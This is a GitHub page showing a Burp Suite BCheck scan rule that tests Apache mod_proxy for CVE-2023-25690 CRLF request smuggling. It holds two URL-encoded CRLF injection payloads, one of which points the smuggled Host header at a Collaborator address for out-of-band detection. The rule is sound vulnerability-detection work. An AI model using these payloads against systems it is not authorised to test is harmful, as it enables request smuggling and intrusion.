forked from PortSwigger/BChecks
-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2023-25690 Apache mod_proxy CRLF Smuggling
33 lines (29 loc) · 1.32 KB
/
CVE-2023-25690 Apache mod_proxy CRLF Smuggling
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
metadata:
language: v1-beta
name: "CVE-2023-25690"
description: "Tests for CRLF based HTTP Request Smuggling/Splitting according to CVE-2023-25690"
author: "Peyton Kennedy"
define:
injected_payload1 =`%20HTTP/1.1%0d%0aHost:%20127.0.0.1%0d%0a%0d%0aGET%20/SMUGGLED`
injected_payload2 =`%20HTTP/1.1%0d%0aHost:%20{generate_collaborator_address()}%0d%0a%0d%0aGET%20/SMUGGLED`
given request then
send request called split:
method: "GET"
appending path: {injected_payload1}
send request called oob:
method: "GET"
appending path: {injected_payload2}
if {split.response.body} matches "\"statusCode\":200" or {latest.response.status_code} is "200" then
report issue:
severity: medium
confidence: tentative
detail: "Apache mod_proxy rules appear to be insecurely splitting requests based on URI path. For more detail, refrence CVE-2023-25690"
remediation: "Upgrade to latest version of Apache mod_proxy"
end if
if http interactions then
report issue:
severity: high
confidence: firm
detail: "External interaction is detected from an arbitrary host header due to CVE-2023-25690"
remediation: "Upgrade to latest version of Apache mod_proxy"
end if